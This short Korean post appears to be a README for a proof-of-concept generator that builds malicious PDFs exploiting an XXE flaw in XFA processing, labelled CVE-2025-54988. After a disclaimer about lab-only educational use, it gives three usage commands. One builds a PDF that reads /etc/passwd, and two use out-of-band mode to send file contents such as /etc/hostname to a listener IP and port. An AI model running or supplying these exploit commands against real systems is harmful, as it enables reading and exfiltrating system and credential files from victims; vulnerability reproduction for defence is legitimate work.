
CVE-2025-54988용 PDF 생성기
면책 조항: 저는 이 취약점의 최초 발견자가 아닙니다. 이 게시물은 교육 목적과 다른 사람들이 자신의 시스템을 검증하는 데 도움을 주기 위해 통제된 환경에서 이 문제를 재현한 과정을 문서화한 것입니다. 테스트는 격리된 실험실에서 수행되었으며 프로덕션 시스템에는 영향을 미치지 않았습니다.
사용법:
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
